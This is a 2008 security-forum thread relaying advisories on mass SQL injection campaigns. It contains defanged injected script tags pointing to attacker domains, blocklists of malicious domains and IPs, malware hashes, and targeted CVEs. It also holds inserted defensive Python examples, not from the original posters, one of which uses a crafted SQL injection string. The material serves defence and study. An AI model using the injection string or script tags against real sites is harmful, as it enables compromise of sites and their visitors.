Hundreds of thousands of SQL injections

69 replies to this topic

#1 AplusWebMaster

  • SWI Friend
  • 11,104 posts

Posted 22 April 2008 - 02:20 PM

FYI...

- http://securitylabs....lerts/3070.aspx
04.22.2008 - "...malicious JavaScript injection that compromised thousands of domains at the start of this month, just 2-3 weeks ago. The attackers have now switched over to a new domain as their hub for hosting the malicious payload in this attack. We have no doubt that the two attacks are related... In the last few hours we have seen the number of compromised sites increase by a factor of ten. This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js which is hosted on hxxp ://www.nihao[removed].com The JavaScript code then redirects the user to 1.htm (also hosted on the same server). Once loaded, the file attempts 8 different exploits (the attack last April utilised 12). The exploits target Microsoft applications, specifically browsers not patched against the VML exploit MS07-004 as well as other applications. Ominously files named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time of writing. There are further similarities too between the two mass attacks. Resident on the latest malicious domain is a tool used in the execution of the attack. An analysis of that tool can be found in the ISC diary entry here*... It appears that same tool was used to orchestrate this attack too. When we first started tracking the use of this domain, the malicious JavaScript was still making use of hxxp ://www.nmida[removed].com/... Sites of varying content have been infected including UK government sites, and a United Nations website as can be seen by the Google search... The number of sites affected is in the hundreds of thousands..."
* http://isc.sans.org/...?n&storyid=4294
Last Updated: 2008-04-16 19:14:00 UTC

:ph34r: :ph34r: :ph34r:
.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

#2 AplusWebMaster

Posted 24 April 2008 - 02:54 PM

FYI...

Hundreds of thousands of SQL injections
- http://isc.sans.org/...ml?storyid=4331
Last Updated: 2008-04-24 19:36:50 UTC - "UPDATE.
It is recommended that you block access to hxxp ://www .nihaorr1 .com and the IP it resolves to, 219DOT153DOT46DOT28, at the edge or border of your network.
1.js is the file they are currently injecting. That could change, and it has been injected into thousands of legitimate websites. Visitors to this website are “treated” to 8 different exploits for many Windows-based applications including AIM, RealPlayer, and iTunes. DO NOT visit sites that link to this site as you are very likely to get infected. Trend Micro named the malware toj_agent.KAQ; it watches for passwords and passes them back to the controller's IP.
The crew over at Shadowserver has published additional information related to SQL-injected sites. They included the botnet controller's IP address 61.188.39.214 and a content-based Snort signature for the bot control traffic that is not IP dependent. The bot controller is alive and communicating on port 2034 with some infected clients at this time.
http://www.shadowser...lendar.20080424
http://www.shadowser...lendar.20080313
They have hit city websites, commercial sites and even government websites. This type of injection pretty much nullifies the concept of “trusted website” or “safe sites”.
The Register covered it, stating their search returned 173k injected results:
http://www.theregist...ass_web_attack/
The number I received doing the same search was 226k. Those are not all unique websites. Many sites got hit more than once.
Lou, a self-described “accidental techie”, has been discussing it, as they have been re-injecting this into his database/website “every other day”. http://www.experts-e...Q_23337211.html
Websense has good information on it here:
http://securitylabs....lerts/3070.aspx
We covered the injection tool, the methods to prevent injections and other details here:
http://isc.sans.org/...ml?storyid=4139
http://isc.sans.org/...ml?storyid=4294 ..."

:grrr: :ph34r: :!:

#3 AplusWebMaster

Posted 25 April 2008 - 09:54 AM

FYI... (DO NOT visit the sites mentioned in the commentary as you are very likely to get infected - BLOCK them, but don't go there.)

- http://www.f-secure....s/00001427.html
April 24, 2008 - "...As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves, which happens all the time in discussion forums, blogs, feedback forms, et cetera. Unless that data is sanitized before it gets saved, you can't control what the website will show to the users. This is what SQL injection is all about: exploiting weaknesses in these controls... It finds all text fields in the database and adds a link to malicious JavaScript to each and every one of them, which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring parameter (a dynamic value such as an article ID, product ID, et cetera) and tried to use that to upload their SQL injection code. So far three different domains have been used to host the malicious content — nmidahena .com, aspder .com and nihaorr1 .com. There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains is inaccessible, but that could change. So if you're a firewall administrator we recommend you block access to them.
So what should you do?
- First of all, search your website logs for the code above and see if you've been hit. If so, clean up your database to prevent your website visitors from becoming infected.
- Second, make sure that all the data you pass to your database is sanitized and that no code elements can be stored there.
- Third, block access to the sites above.
- Fourth, make sure the software you use is patched...
- Fifth, keep your antivirus solution up-to-date."

(Note: per http://www.shadowser...lendar.20080424 :
"...nmidahena.com... domain has since been killed off and looks like our attacker has moved on to some new ones... it most likely won't take too long for others to catch on and possibly conducting even more nefarious activities. If your site has fallen victim to one of these attacks, it's not just important you remove the offending injections, but it's even more important you fix the SQL injection attack vector. If you do not, your website will continue to be vulnerable to similar or worse attacks.")

(...where the other factors enter in)
- http://preview.tinyurl.com/6c8bet - 04/24/2008 (Networkworld) - "... SQL injection attacks on Microsoft Internet Information Servers are leaving Web pages with malicious -iFrames- in them... Web pages are infected with the iFrame code by looking for a specific code string in the source code of the Web page associated to an iFrame tag..."

:ph34r:
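As an added example (not from the post or the F-Secure article it quotes) of the first two cleanup steps, finding the injected tag and removing it from the database: the script below walks every character-typed column, reports each `<script src=...></script>` tag it finds, including the URL-encoded form later re-injection runs used, and strips it. It uses an in-memory SQLite database with constructed rows and a placeholder host (`malicious.example.invalid`) as a stand-in for the SQL Server back-ends the attacks hit; on SQL Server the same walk would go over INFORMATION_SCHEMA.COLUMNS.

```python
import re
import sqlite3
from urllib.parse import quote, unquote

# Injected tag as it appears in a text field: <script src=...></script>.
# The src may be bare or quoted; the tag is matched case-insensitively.
RAW_TAG_RE = re.compile(
    r"<script\s+src=[\"']?(?P<src>[^\"'\s>]+)[\"']?\s*>\s*</script\s*>",
    re.IGNORECASE,
)
# The same tag after URL encoding (%3Cscript%20src%3D...%3E%3C%2Fscript%3E),
# which later re-injection runs used to slip past exact-string searches.
ENCODED_TAG_RE = re.compile(
    r"%3Cscript(?:%20|\+)src%3D(?P<src>.+?)%3E%3C%2Fscript%3E",
    re.IGNORECASE,
)


def find_injected_scripts(text):
    """Return the script URLs injected into one text value (decoded)."""
    found = [m.group("src") for m in RAW_TAG_RE.finditer(text)]
    found += [unquote(m.group("src")) for m in ENCODED_TAG_RE.finditer(text)]
    return found


def strip_injected_scripts(text):
    """Remove both the raw and the URL-encoded form of the injected tag."""
    return ENCODED_TAG_RE.sub("", RAW_TAG_RE.sub("", text))


def text_columns(conn):
    """Yield (table, column) for every character-typed column in the database."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if any(k in ctype.upper() for k in ("CHAR", "TEXT", "CLOB")):
                yield table, name


def scan_database(conn):
    """List every (table, column, rowid, src) where an injected tag was found."""
    hits = []
    for table, column in text_columns(conn):
        # Table and column names come from the schema, not from user input.
        rows = conn.execute(f'SELECT rowid, "{column}" FROM "{table}"').fetchall()
        for rowid, value in rows:
            for src in find_injected_scripts(value or ""):
                hits.append((table, column, rowid, src))
    return hits


def clean_database(conn):
    """Strip injected tags in place; returns the number of cells rewritten."""
    changed = 0
    for table, column in text_columns(conn):
        rows = conn.execute(f'SELECT rowid, "{column}" FROM "{table}"').fetchall()
        for rowid, value in rows:
            if value is None:
                continue
            cleaned = strip_injected_scripts(value)
            if cleaned != value:
                conn.execute(f'UPDATE "{table}" SET "{column}" = ? WHERE rowid = ?',
                             (cleaned, rowid))
                changed += 1
    conn.commit()
    return changed


# Constructed sample database standing in for a compromised site's SQL Server;
# the host is a placeholder, not one of the domains from the thread.
INJECTED = "<script src=http://malicious.example.invalid/1.js></script>"


def sample_database():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(100), price REAL)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", [
        (1, "Welcome", "Hello world" + INJECTED),                    # plain injection
        (2, "News", "Plain text, nothing injected"),
        (3, "Re-injected", "Some text" + quote(INJECTED, safe="")),  # URL-encoded run
    ])
    conn.execute("INSERT INTO products VALUES (?, ?, ?)", (1, "Widget" + INJECTED, 9.99))
    conn.commit()
    return conn


if __name__ == "__main__":
    db = sample_database()
    for hit in scan_database(db):
        print("injected:", hit)
    print("cells cleaned:", clean_database(db))
    print("remaining:", scan_database(db))
```

Run `scan_database` first and keep the report; take a backup before `clean_database`, since it rewrites cells. Stripping the tag only removes the symptom: the page that concatenated the query string into SQL is still injectable until it is fixed, which is the point Shadowserver makes in the note quoted above.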

#4 AplusWebMaster

Posted 26 April 2008 - 05:48 AM

For clarification:

(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

>>> http://www.f-secure....s/00001427.html
April 24, 2008 - "...So far three different domains have been used to host the malicious content — nmidahena .com*, aspder .com and nihaorr1 .com.
There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains is inaccessible, but that could change. So if you're a firewall administrator we recommend you block access to them..."

4.26.2008 - NOW
- http://centralops.ne...ainDossier.aspx
aspder .com ***
aliases
addresses 60.172.219.4
country: CN
-------------------
nihaorr1 .com ***
aliases
addresses 219.153.46.28
country: CN
-------------------
nmidahena .com *
Could not find an IP address for this domain name.
....................
* (Note: per http://www.shadowser...lendar.20080424 : "...nmidahena.com... domain has since been killed off and looks like our attacker has moved on to some new ones...)

:ph34r: :ph34r:

#5 AplusWebMaster

Posted 07 May 2008 - 04:55 AM

FYI...

SQL Injection Worm on the Loose
- http://isc.sans.org/...ml?storyid=4393
Last Updated: 2008-05-07 05:12:53 UTC - "A loyal ISC reader... wrote in to point us at what looks to be a SQL injection worm that is on the loose. From a quick Google search it shows that there are about 4,000 websites infected and that this worm started at least mid-April if not earlier. Right now we can't speak intelligently to how they are getting into databases, but what they are doing is putting in some scripts and iframes to take over visitors to the websites. It looks like the infection of user machines is by RealPlayer vulnerabilities that seem to be detected more or less well. The details: the script source that is injected into webpages is hxxp ://winzipices .cn /#.js (where # is 1-5). This, in turn, points to a corresponding ASP page on the same server (i.e. hxxp :// winzipices .cn/#.asp). This in turn points back to the exploits, either from the cnzz .com domain or the 51 .la domain. The cnzz .com (hxxp ://s141 .cnzz .com) domain looks like it could be set up for single flux, but it's the same pool of IP addresses all the time right now. hxxp ://www .51 .la just points to 51la .ajiang .net which has a short TTL, but only one IP is serving it.
Fair warning: if you Google these hostnames, you will find exploited sites that will try and reach out and "touch" you... even if you are looking at the "cached" page. Proceed at your own risk.
UPDATE: We're also seeing this website serving up some attacks in connection with this SQL worm
(hxxp ://bbs .jueduizuan .com)"

:ph34r: :ph34r:

#6 AplusWebMaster

Posted 07 May 2008 - 12:52 PM

FYI...

New SQL Injection Attacks and New Malware: winzipices .cn
- http://www.shadowser...lendar.20080507
7 May 2008
"Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

As predicted, the attacks against ASP and ASP.NET pages via SQL injection have continued. This time the domain name "winzipices.cn" is in the spotlight. It has managed to find itself in the source of over 4,000 pages according to Google. ISC also has a short diary today mentioning this attack here. It turns out this is also something we have been taking a look at now for a few days. With that being said, we would like to share some information that can help protect end users and organizations. It would appear that our attackers in this instance are taking advantage of the same issues we have discussed in some of our recent postings. However, we do know that the malware and malicious file trail here is different from the last few attacks. If your website has been hacked or you are visiting a hacked website, you will find something like this in the HTML source of the page you visit:
"<script src=hxxp ://winzipices .cn/ 5.js></script>"
It appears that 1.js, 2.js, 3.js, and 4.js are also present. Each of these files in turn has hidden iframes...
Malware Binaries:
File MD5: 8ca53bf2b7d8107d106da2da0f8ca700 (test.exe)
File Size: 28301 bytes
File MD5: 5c9322a95aaafbfabfaf225277867f5b (1.exe)
File Size: 38400 bytes
Protection & Detection
As always we recommend that you block access to the malicious domains and sites. Using a content filter, changing DNS entries, and blocking IP addresses are all valid methods. Of course being up-to-date on your patches can also go a long way. Here's a quick recap of the malicious sites/IP addresses involved in this attack:
-winzipices.cn [60.191.239.229]
-61.188.38.158
-61.134.37.15
Note that blocking by IP address could potentially block other legitimate pages on the host (not likely in this case). It's also generally only valid or helpful for a short period of time as attackers frequently change both IP addresses and domain names."

:ph34r: :!: :ph34r:

#7 Abadi

  • Full Member
  • 12 posts

Posted 07 May 2008 - 06:22 PM

Thanks for the post :)

#8 AplusWebMaster

Posted 10 May 2008 - 02:38 AM

(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

SQL injection continues
- http://www.f-secure....s/00001432.html
May 10, 2008 - "...The attacks have now started again, this time pointing to several different domains. During the last few days we've seen the same type of encoded SQL script as in the previous case being inserted into ASP/ASP.NET pages. The scripts point to the following domains:
yl18 .net
www .bluell .cn
www .kisswow .com .cn
www .ririwow .cn
winzipices .cn
All of the domains above are pointing to IP addresses in China. Just like last time the scripts try to use several exploits to infect the user's computer."

- http://blog.trendmic...es-compromised/
May 10, 2008 - "...As several thousand Web sites try to recover from being hacked via SQL injection barely two days ago, in comes another massive attack on more than half a million Web sites. Advanced Threats Research Program Manager Ivan Macalintal found the malicious script JS_SMALL.QT injected into various Web sites believed to be either using poorly implemented phpBB, or using older, exploitable versions of the said program... In true ZLOB fashion, this variant poses as a video codec installer... These types of Trojans are known for changing an affected system’s local DNS and Internet browser settings, thus making the system vulnerable to even more potential threats..."

:ph34r: :ph34r:

Edited by apluswebmaster, 10 May 2008 - 01:36 PM.


#9 AplusWebMaster

Posted 11 May 2008 - 07:46 PM

FYI...

Mass File Injection Attack
- http://isc.sans.org/...ml?storyid=4405
Last Updated: 2008-05-11 21:48:56 UTC - "We received a report... this afternoon about a couple of URLs containing a malicious JavaScript that pulls down a file associated with Zlob. If you do a google search for these two URLs, you get about 400,000 sites that have a call to this Javascript file included in them now. The major portion of the sites seem to be running phpBB forum software.
If you have a proxy server that logs outbound web traffic at your site, you might want to look for connection attempts to these two sites. Internal clients that have connected may need some cleanup work. Another preventive step would be to blacklist these two URLs.

hxxp ://free .hostpinoy .info /f.js
hxxp ://xprmn4u.info /f .js "

:grrr: :ph34r:

#10 freckling

  • New Member
  • 1 post

Posted 12 May 2008 - 08:17 AM

The best advice I've found in protecting against SQL injection attacks is to always check and validate input. This includes automatically removing bad characters from input and parameterizing your input statements. There's a very good tutorial on basic security against SQL injections on http://www.microsoft...llosecureworld7
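A worked illustration of that advice, added here and not part of the post: the concatenated-query pattern the thread's attacks exploited next to its validated, parameterised replacement, run against a constructed in-memory SQLite table. sqlite3's `executescript()` stands in for a driver that executes statement batches, as ADO did against the SQL Server back-ends behind the ASP pages; the `articles` table and the `[injected]` marker are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the table behind an article.asp?id=... page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                     [(1, "First", "alpha"), (2, "Second", "beta")])
    conn.commit()
    return conn


def bodies(conn):
    """Current body text of every article, in id order (used to show the effect)."""
    return [row[0] for row in conn.execute("SELECT body FROM articles ORDER BY id")]


def vulnerable_lookup(conn, article_id):
    """The flawed pattern: the query-string value is pasted into the SQL text.

    executescript() runs a batch of statements (as ADO against SQL Server does),
    so anything appended after a semicolon in article_id is executed as well.
    """
    conn.cursor().executescript("SELECT id, title FROM articles WHERE id = " + article_id)


def safe_lookup(conn, article_id):
    """Validate the input, then bind it as a parameter so it is only ever data."""
    if not article_id.isdigit():          # an article id is a whole number, nothing else
        return None
    return conn.execute("SELECT id, title FROM articles WHERE id = ?",
                        (int(article_id),)).fetchone()


# Constructed input: a valid id followed by an appended statement that writes a
# marker into every text field, the shape of the mass injections in the thread.
CRAFTED_ID = "1;UPDATE articles SET body = body || '[injected]'"

if __name__ == "__main__":
    db = make_db()
    print("parameterised:", safe_lookup(db, CRAFTED_ID), bodies(db))
    vulnerable_lookup(db, CRAFTED_ID)
    print("concatenated: ", bodies(db))
```

The validation step rejects the crafted value outright; even without it, the bound parameter would be compared as a value rather than parsed as SQL, so no second statement could be appended. Both belong together: validation keeps junk out of the query, parameterisation guarantees the data can never change the query's structure.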

#11 AplusWebMaster

Posted 13 May 2008 - 09:28 AM

FYI...

- http://www.techworld...amp;pagtype=all
13 May 2008 - "...'This is an on-going campaign, with new domains [hosting the malware] popping up even this morning,' said Paul Ferguson, a network architect with anti-virus vendor Trend Micro. 'The domains are changing constantly.' According to Ferguson, over half a million legitimate websites have been hacked by today's mass-scale attack, only the latest in a string that goes back to at least January. All of the sites, he confirmed, are running "phpBB", an open-source message forum manager... Visitors to a hacked site are redirected through a series of servers, some clearly compromised themselves, until the last in the chain is reached. That server then pings the PC for any one of several vulnerabilities, including bugs in both Internet Explorer and the RealPlayer media player. If any of the vulnerabilities are present, the PC is exploited and malware is downloaded to it..."
* http://preview.tinyurl.com/6f2uro
Apr 07, 2008 - "phpBB 3.0.1 released... critical bugs fixed..."

:ph34r:

#12 AplusWebMaster

Posted 14 May 2008 - 04:11 AM

Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.

SQL Injection Attacks Becoming More Intense
- http://www.f-secure....s/00001435.html
May 13, 2008 - "The mass SQL injection attacks... are increasing in number and we're seeing more domains being injected and used to host the attack files. We believe that there is now more than one group using a set of different automated tools to inject the code. Previously, these attacks have primarily pointed to IP addresses in China and we've seen the following domains being used in addition to the ones we've mentioned previously:
www .wowgm1 .cn
www .killwow1 .cn
www .wowyeye .cn
vb008 .cn
9i5t .cn
computershello .cn
We've now seen other domains being used as well, such as direct84 .com, which is inserted by an SQL injection tool (detected as HackTool:W32/Agent.B) distributed to the Asprox botnet. SecureWorks has a nice write-up available*. The direct84 .com domain fast-fluxes to several different IPs in Europe, Israel and North America. The injected link eventually leads to a backdoor detected as Backdoor:W32/Agent.DAS. This is a good time to again mention that it's not a vulnerability in Microsoft IIS or Microsoft SQL that is used to make this happen. If you are an administrator of a website that is using ASP/ASP.NET, you should make sure that you sanitize all inputs before you allow them to access the database. There are many articles on how to do this, such as this one**. You could also have a look at URLScan***, which provides an easy way to filter this particular attack based on the length of the QueryString."

* http://www.securewor...s/danmecasprox/
May 13, 2008 - "...the SQL attack tool does not spread on its own, it relies on the Asprox botnet in order to propagate to new hosts..."

** http://msdn.microsof...y/ms998271.aspx

*** http://www.microsoft...ls/urlscan.mspx

Also see: http://www.shadowser...lendar.20080513
May 13, 2008

...and: http://isc.sans.org/...ml?storyid=4418
Last Updated: 2008-05-14 00:31:33 UTC

:ph34r: :ph34r:

Edited by apluswebmaster, 14 May 2008 - 04:42 AM.

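An added example (not from the post or the F-Secure article) of the length-based filtering the article attributes to URLScan, applied after the fact to server logs: parse IIS W3C extended log lines, flag requests whose query string exceeds a limit, and group them by source address so the hosts probing many pages stand out. The log lines are constructed, the 1024-byte limit is an assumption (URLScan's equivalent is its MaxQueryString setting), and the addresses are from the documentation ranges.

```python
# Constructed W3C extended log excerpt; '+' replaces spaces in the user agent
# as IIS writes it. 198.51.100.7 (documentation range) plays the probing host,
# and the long query strings are filler of the size such requests carried.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2008-04-24 10:15:01 10.0.0.5 GET /news/article.asp id=17 192.0.2.44 Mozilla/4.0+(compatible;+MSIE+7.0) 200
2008-04-24 10:15:02 10.0.0.5 GET /shop/product.asp prod=3&page=2 192.0.2.45 Mozilla/4.0+(compatible;+MSIE+6.0) 200
2008-04-24 10:15:03 10.0.0.5 GET /news/article.asp {long1} 198.51.100.7 Mozilla/4.0+(compatible;+MSIE+6.0) 500
2008-04-24 10:15:04 10.0.0.5 GET /shop/product.asp {long2} 198.51.100.7 Mozilla/4.0+(compatible;+MSIE+6.0) 200
2008-04-24 10:15:05 10.0.0.5 GET /default.asp - 192.0.2.46 Mozilla/5.0 200
""".format(long1="id=17%3B" + "%41" * 400, long2="prod=3%3B" + "%41" * 380).splitlines()


def parse_w3c_log(lines):
    """Yield one dict per request, keyed by the names in the latest '#Fields:' header."""
    fields = None
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue                      # other directives and blank lines
        elif fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def long_query_requests(lines, max_query_len=1024):
    """Return [(c-ip, cs-uri-stem, query_length)] for requests over the limit.

    Legitimate ?id=17 style parameters are short; the injected SQL batches
    were not, which is what URLScan's query-string limit keys on.
    """
    hits = []
    for rec in parse_w3c_log(lines):
        query = rec.get("cs-uri-query", "-")
        if query != "-" and len(query) > max_query_len:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], len(query)))
    return hits


def attack_sources(lines, max_query_len=1024):
    """Group long-query requests by source address -> sorted distinct pages probed."""
    by_source = {}
    for client, stem, _length in long_query_requests(lines, max_query_len):
        by_source.setdefault(client, set()).add(stem)
    return {client: sorted(stems) for client, stems in by_source.items()}


if __name__ == "__main__":
    for client, stem, length in long_query_requests(SAMPLE_LOG):
        print(f"{client} -> {stem} ({length} byte query)")
    print(attack_sources(SAMPLE_LOG))
```

A length limit is a coarse filter, not a fix: it catches this campaign's oversized batches but not a short injection, so it complements, rather than replaces, parameterised queries in the pages themselves.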

#13 AplusWebMaster

Posted 14 May 2008 - 12:56 PM

(Warning: We strongly suggest that readers NOT visit websites mentioned as being behind the attacks discussed. They should be considered dangerous and capable of infecting your system.)

Full list of Injected Sites
- http://www.shadowser...lendar.20080514
Posted May 14, 2008, at 07:42 AM - "Below is a list of domains used in the mass SQL injections that insert malicious javascript into websites. We've also included an approximate number of pages infected (according to Google). Note that these numbers decay with time. Some of these domains were injected long ago and have been cleaned. At their height, their numbers may have been larger.

www .nihaorr1 .com -468,000
free .hostpinoy .info -444,000
xprmn4u .info -369,000
www .nmidahena .com -140,000
winzipices .cn -75,000

www .aspder .com -62,000
www .11910 .net -47,000
bbs .jueduizuan .com -44,000
www .bluell .cn -44,000
www .2117966 .net -39,000

xvgaoke .cn -33,000
www .414151 .com -17,000
yl18 .net -15,000
www .kisswow .com .cn -13,000
c .uc8010 .com -9500

www .ririwow .cn -6000
www .killwow1 .cn -4000
www .wowgm1 .cn -3500
www .wowyeye .cn -2800
9i5t .cn -2500

computershello .cn -2300
b15 .3322 .org -1200
www .direct84 .com -1100
smeisp .cn -85
free .edivid .info -40
h28 .8800 .org -34

ucmal .com -30
usuc .us -13
www .wowgm2 .cn -8
www .adword72 .com -2

=> Posted May 14, 2008, at 07:42 AM.
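As an added example (not from the Shadowserver page or the post), the list above turned into something a proxy administrator can act on, which is also the check post #9 suggests for outbound proxy logs: parse a defanged "host -count" list like the one quoted, refang the hostnames, and match them against Squid-style access log lines to find internal clients that fetched from those domains. The list excerpt and the log lines are constructed (the hostnames are the ones quoted above; the addresses are placeholders).

```python
import re
from urllib.parse import urlsplit

# Constructed excerpt in the defanged "host -count" style of the Shadowserver
# list quoted above (hosts written with spaces around the dots).
BLOCKLIST_TEXT = """
www .nihaorr1 .com -468,000
free .hostpinoy .info -444,000
xprmn4u .info -369,000
winzipices .cn -75,000
www .direct84 .com -1100
"""

# Constructed Squid native-format access log lines (time elapsed client
# result/status bytes method URL ident hierarchy/peer type); 192.0.2.0/24 and
# the internal 10.0.0.0/8 addresses are placeholders.
PROXY_LOG = """
1208890000.123    245 10.0.0.17 TCP_MISS/200 1843 GET http://www.nihaorr1.com/1.js - DIRECT/192.0.2.10 application/x-javascript
1208890001.456     12 10.0.0.17 TCP_MISS/200 5120 GET http://www.example.com/index.html - DIRECT/192.0.2.11 text/html
1208890002.789    301 10.0.0.42 TCP_MISS/200 902 GET http://free.hostpinoy.info/f.js - DIRECT/192.0.2.12 application/x-javascript
1208890003.000     50 10.0.0.42 TCP_MISS/200 1200 GET http://xprmn4u.info/f.js - DIRECT/192.0.2.13 application/x-javascript
1208890004.500     40 10.0.0.99 TCP_HIT/200 7000 GET http://www.example.org/ - NONE/- text/html
""".strip().splitlines()


def refang(host):
    """Collapse the defanged 'www .nihaorr1 .com' spelling to a real hostname."""
    return re.sub(r"\s*\.\s*", ".", host.strip()).lower().rstrip(".")


def parse_blocklist(text):
    """Return {domain: approx_pages}; a leading 'www.' is dropped so the bare
    domain covers every host under it."""
    entries = {}
    for line in text.strip().splitlines():
        m = re.match(r"^(?P<host>.+?)\s+-(?P<count>[\d,]+)\s*$", line.strip())
        if not m:
            continue
        domain = refang(m.group("host"))
        if domain.startswith("www."):
            domain = domain[4:]
        entries[domain] = int(m.group("count").replace(",", ""))
    return entries


def match_blocklist(host, blocklist):
    """Return the blocklist entry covering host (exact or any parent domain), else None."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):       # never match on the bare TLD
        candidate = ".".join(labels[i:])
        if candidate in blocklist:
            return candidate
    return None


def scan_proxy_log(lines, blocklist):
    """Map each internal client to the sorted blocklisted domains it requested."""
    hits = {}
    for line in lines:
        parts = line.split()
        if len(parts) < 7:
            continue
        client, url = parts[2], parts[6]
        host = urlsplit(url).hostname
        matched = match_blocklist(host, blocklist) if host else None
        if matched:
            hits.setdefault(client, set()).add(matched)
    return {client: sorted(domains) for client, domains in hits.items()}


if __name__ == "__main__":
    blocklist = parse_blocklist(BLOCKLIST_TEXT)
    for client, domains in scan_proxy_log(PROXY_LOG, blocklist).items():
        print(client, "->", ", ".join(domains))
```

Matching on the parent domain is deliberate: the list mixes bare domains with `www.` hosts, and the same domain was seen under several hostnames. A client that shows up here fetched the script, which is reason enough to inspect it; as the Shadowserver note above says, domains and addresses in this campaign rotated quickly, so the list needs refreshing to stay useful.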

#14 AplusWebMaster

Posted 19 May 2008 - 05:35 AM

FYI...

Mass SQL Injection Attack Targets Chinese Web Sites
- http://preview.tinyurl.com/5tmj3q
May 19, 2008 3:00 AM PDT (PC World) - "Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites, according to a security company in Taiwan. First detected on May 13, the attack is coming from a server farm inside China, which has made no effort to hide its IP (Internet Protocol) addresses, said Wayne Huang, chief executive officer of Armorize Technologies, in Taipei. "The attack is ongoing,... even if they can't successfully insert malware, they're killing lots of Web sites right now, because they're just brute-forcing every attack surface with SQL injection, and hence causing lots of permanent changes to the victim websites," Huang said... Technical details of the malware, including the specific browser vulnerabilities exploited, were not immediately available..."

:ph34r:

#15 AplusWebMaster

Posted 19 May 2008 - 11:28 AM

More on the China/Taiwan SQL attacks...

- http://preview.tinyurl.com/56u2m7
May 19, 2008 (Computerworld) - "Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites... The attackers in the more recent outbreak aren't targeting a specific vulnerability. Instead, they are using an automated SQL injection attack engine that is tailored to attack Web sites using SQL Server, Huang said. The attack uses SQL injection to infect targeted Web sites with malware, which in turn exploits vulnerabilities in the browsers of those who visit the Web sites, he said, calling the attack "very well designed." The malware injected by the attack comes from 1,000 different servers and targets 10 vulnerabilities in Internet Explorer and related plug-ins that are popular in Asia, Huang said.

The vulnerabilities are MS06-014 (CVE-2006-0003), MS07-017 (CVE-2007-1765), RealPlayer IERPCtl.IERPCtl.1 (CVE-2007-5601), GLCHAT.GLChatCtrl.1 (CVE-2007-5722), MPS.StormPlayer.1 (CVE-2007-4816), QvodInsert.QvodCtrl.1, DPClient.Vod (CVE-2007-6144), BaiduBar.Tool.1 (CVE-2007-4105), VML Exploit (CVE-2006-4868) and PPStream (CVE-2007-4748)."
- http://nvd.nist.gov/nvd.cfm

- http://blog.trendmic...end-compromise/
May 19, 2008

:eek: :ph34r:

Edited by apluswebmaster, 19 May 2008 - 12:03 PM.


#16 AplusWebMaster

Posted 19 May 2008 - 03:23 PM

Follow-up:

- http://www.computerw...8#comment-92914
[China and Taiwan - SQL injection attacks]
Submitted by Anonymous tech on May 19, 2008 - 16:11.
" 'Web sites across China and Taiwan are being hit by a mass SQL injection attack that has implanted malware in thousands of Web sites...'

That appears to be incorrect - the SQL injection plants a java-scripted IFRAME which re-directs the victim's browser to an attacker's site that performs the exploits. Please check the facts. More than one source would confirm it.

Every other SQL injection attack to date has done that, using an Mpack-like exploit tool at the attackers' site - NOT the site that was the victim of the SQL injection."

:!:

#17 AplusWebMaster

Posted 23 May 2008 - 12:32 PM

APAC SQL attacks...

- http://blog.trendmic...h-other-shores/
May 19, 2008 - "...This discovery comes on the tail of the mass compromise* of APAC sites (China, Taiwan, Hong Kong, and Singapore). Curious is how some of the malicious URLs in this new set of compromises are the same as in the first mass compromise. The four sites — humanitarian, government, and news — were injected with the malicious JavaScript..."

Chinese Weekend Compromise
* http://blog.trendmic...end-compromise/
May 19, 2008 - "Just a week after half a million Web sites were compromised, here comes another mass Web threat... This time, Senior Threat Analyst Aries Hsieh, together with our research team in Taiwan, picked up on another script injection attack aimed at Web sites in the Chinese language... A visit to any compromised site would install and execute a malicious script on a system. This said script, which Trend Micro detects as JS_IFRAME.AC, may be downloaded from the remote site hxxp ://{BLOCKED} .us /s.js

JS_IFRAME.AC then downloads JS_IFRAME.AD, which exploits several vulnerabilities to further insert scripts in Web sites. TrendLabs Threats analyst Jonathan San Jose identifies the following exploit routines of JS_IFRAME.AD:
1. Exploits a vulnerability in Microsoft Data Access Components (MDAC) MS06-14, which allows for remote code execution on an affected system
2. Uses the import function IERPCtl.IERPCtl.1 or IERPPLUG.DLL to send the shell code to an installed RealPlayer
3. Checks for GLAVATAR.GLAvatarCtrl.1
